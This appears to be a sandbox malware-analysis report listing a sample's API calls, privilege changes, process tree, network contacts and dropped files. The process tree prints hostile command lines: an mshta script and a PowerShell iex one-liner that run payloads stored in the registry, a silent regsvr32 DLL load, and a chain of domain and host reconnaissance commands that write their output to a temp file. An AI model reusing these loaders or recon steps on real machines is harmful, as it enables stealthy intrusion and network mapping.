Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\system32\control.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>U8sf='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(U8sf).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\FAC9767C-11D1-3C57-6BCE-D530CFE2D964\\\LineStop'));if(!window.flag)close()</script>"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name bjunbw -value gp; new-alias -name dqmwsgwvn -value iex; dqmwsgwvn ([System.Text.Encoding]::ASCII.GetString((bjunbw "HKCU:Software\AppDataLow\Software\Microsoft\FAC9767C-11D1-3C57-6BCE-D530CFE2D964").MaskStop))
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qpvas05h\qpvas05h.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4F20.tmp" "c:\Users\Admin\AppData\Local\Temp\qpvas05h\CSCA3E45F721DCC41A99BA936F9208D8B74.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\e25fyw13\e25fyw13.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5087.tmp" "c:\Users\Admin\AppData\Local\Temp\e25fyw13\CSC7A9004E1C5EB484596BB47739548E5.TMP"
C:\Windows\system32\control.exe
C:\Windows\system32\control.exe -h
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get domain
C:\Windows\system32\cmd.exe
cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
C:\Windows\system32\more.com
more
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\cmd.exe
cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\systeminfo.exe
systeminfo.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\net.exe
net view
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\nslookup.exe
nslookup 127.0.0.1
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\cmd.exe
cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\tasklist.exe
tasklist.exe /SVC
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\cmd.exe
cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\driverquery.exe
driverquery.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\cmd.exe
cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\reg.exe
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\net.exe
net config workstation
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 config workstation
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\nltest.exe
nltest /domain_trusts
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\nltest.exe
nltest /domain_trusts /all_trusts
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\net.exe
net view /all /domain
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
C:\Windows\system32\net.exe
net view /all
Network
| Country | Destination | Domain | Proto |
| US | 209.197.3.8:80 | | tcp |
| US | 13.107.42.16:80 | config.edge.skype.com | tcp |
| NL | 79.110.52.8:80 | 79.110.52.8 | tcp |
| RU | 5.42.199.72:80 | 5.42.199.72 | tcp |
| NL | 79.110.52.82:80 | 79.110.52.82 | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.0.0.127.in-addr.arpa | udp |
Files
\??\c:\Users\Admin\AppData\Local\Temp\qpvas05h\qpvas05h.cmdline
\??\c:\Users\Admin\AppData\Local\Temp\qpvas05h\qpvas05h.0.cs
\??\c:\Users\Admin\AppData\Local\Temp\qpvas05h\CSCA3E45F721DCC41A99BA936F9208D8B74.TMP
C:\Users\Admin\AppData\Local\Temp\RES4F20.tmp
C:\Users\Admin\AppData\Local\Temp\qpvas05h\qpvas05h.dll
\??\c:\Users\Admin\AppData\Local\Temp\e25fyw13\e25fyw13.cmdline
\??\c:\Users\Admin\AppData\Local\Temp\e25fyw13\e25fyw13.0.cs
\??\c:\Users\Admin\AppData\Local\Temp\e25fyw13\CSC7A9004E1C5EB484596BB47739548E5.TMP
C:\Users\Admin\AppData\Local\Temp\RES5087.tmp
C:\Users\Admin\AppData\Local\Temp\e25fyw13\e25fyw13.dll
C:\Users\Admin\AppData\Local\Temp\3BC.bin1